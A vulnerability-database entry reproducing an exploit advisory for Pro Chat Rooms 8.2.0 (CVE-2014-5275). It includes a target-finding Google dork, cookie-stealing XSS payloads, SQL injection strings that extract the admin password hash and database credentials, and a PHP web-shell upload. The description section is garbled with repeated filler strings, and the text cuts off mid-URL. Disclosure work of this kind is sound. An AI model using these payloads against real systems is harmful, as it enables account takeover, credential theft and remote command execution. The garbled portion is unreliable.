Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

41   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1285
CVE编号: CVE-2014-5275
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-08-08
CVSS
CVSS值: -
严重级别: 高危
利用范围: -
攻击复杂度: -
认证级别: -
漏洞描述

WLB-2014080034[***]http://cxsecurity.com/issue/WLB-2014080034[***]Bug: Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection ( Ascii Version )[***]Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection[***]2014-08-08 / 2014-10-28[***]Mike Manzotti @ Dionach Ltd[***]High[***]CWE-89@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********CWE-79@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********CWE-264@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]CVE-2014-5275@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********CVE-2014-5276@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********[***]No[***]Yes[***][***][***][***][***][***][***][***][***] # Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Google Dork: intitle:"Powered by Pro Chat Rooms"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Date: 5 August 2014@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Exploit Author: Mike Manzotti @ Dionach Ltd@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Vendor Homepage: http://prochatrooms.com @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Software Link: http://prochatrooms.com/software.php @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Version: v8.2.0@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Tested on: Debian (Apache+MySQL)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 1) Stored XSS@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** =============@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** upload a profile picture containing Javascript code as shown below:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1 @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Type: image/jpeg@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** <script>alert(document.cookie)</script>@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** below:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Response:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** <input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** digits value as shown below:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Image@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 2) Reflected XSS@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** =============@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$

POC

# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities # Google Dork: intitle:"Powered by Pro Chat Rooms" # Date: 5 August 2014 # Exploit Author: Mike Manzotti @ Dionach Ltd # Vendor Homepage: http://prochatrooms.com # Software Link: http://prochatrooms.com/software.php # Version: v8.2.0 # Tested on: Debian (Apache+MySQL) 1) Stored XSS ============= Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can upload a profile picture containing Javascript code as shown below: POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1 Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg" Content-Type: image/jpeg <script>alert(document.cookie)</script> By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown below: Response: <input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b"> The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32 digits value as shown below: http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b Image 2) Reflected XSS ============= Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</ script> 3) SQL Injection ================ Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi. The vulnerable parameters are located as shown below: prochatrooms_v8.2.0/includes/functions.php: ~2437 $params = array( 'password' => md5($password), 'email' => makeSafe($email), 'id' => $id ); $query = "UPDATE prochatrooms_users SET email = '".$email."', password='".md5($password)."' WHERE id = '".$id."' "; prochatrooms_v8.2.0/includes/functions.php: ~2449 $query = "UPDATE prochatrooms_users SET email = '".$email."' WHERE id = '".$id."' "; prochatrooms_v8.2.0/includes/functions.php: ~3110 $query = "UPDATE prochatrooms_users SET active = '".$offlineTime."', online = '0' WHERE username = '".makeSafe($toname)."' "; Note that the “makeSafe” function is defined as shown below and will protect against XSS attacks only: prochatrooms_v8.2.0/includes/functions.php: ~125 function makeSafe($data) { $data = htmlspecialchars($data); return $data; } After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which will retrieve the MD5 hashed password of the administrator: POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1 Content-Disposition: form-data; name="profileEmail" mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';# The following SQL injection will retrieve the SQL connection string, which probably has clear-text database credentials. POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1 Content-Disposition: form-data; name="profileEmail" mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';# 4) Arbitrary File Upload ========================= It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server. The following request will upload a PHP web shell and the web application will return a 32 digit value. POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1 Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg" Content-Type: application/octet-stream <?php system($_GET[cmd]);?> Response: <input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45"> Since the uploaded web shell is without extension it will not be executed: http://<WEBSIT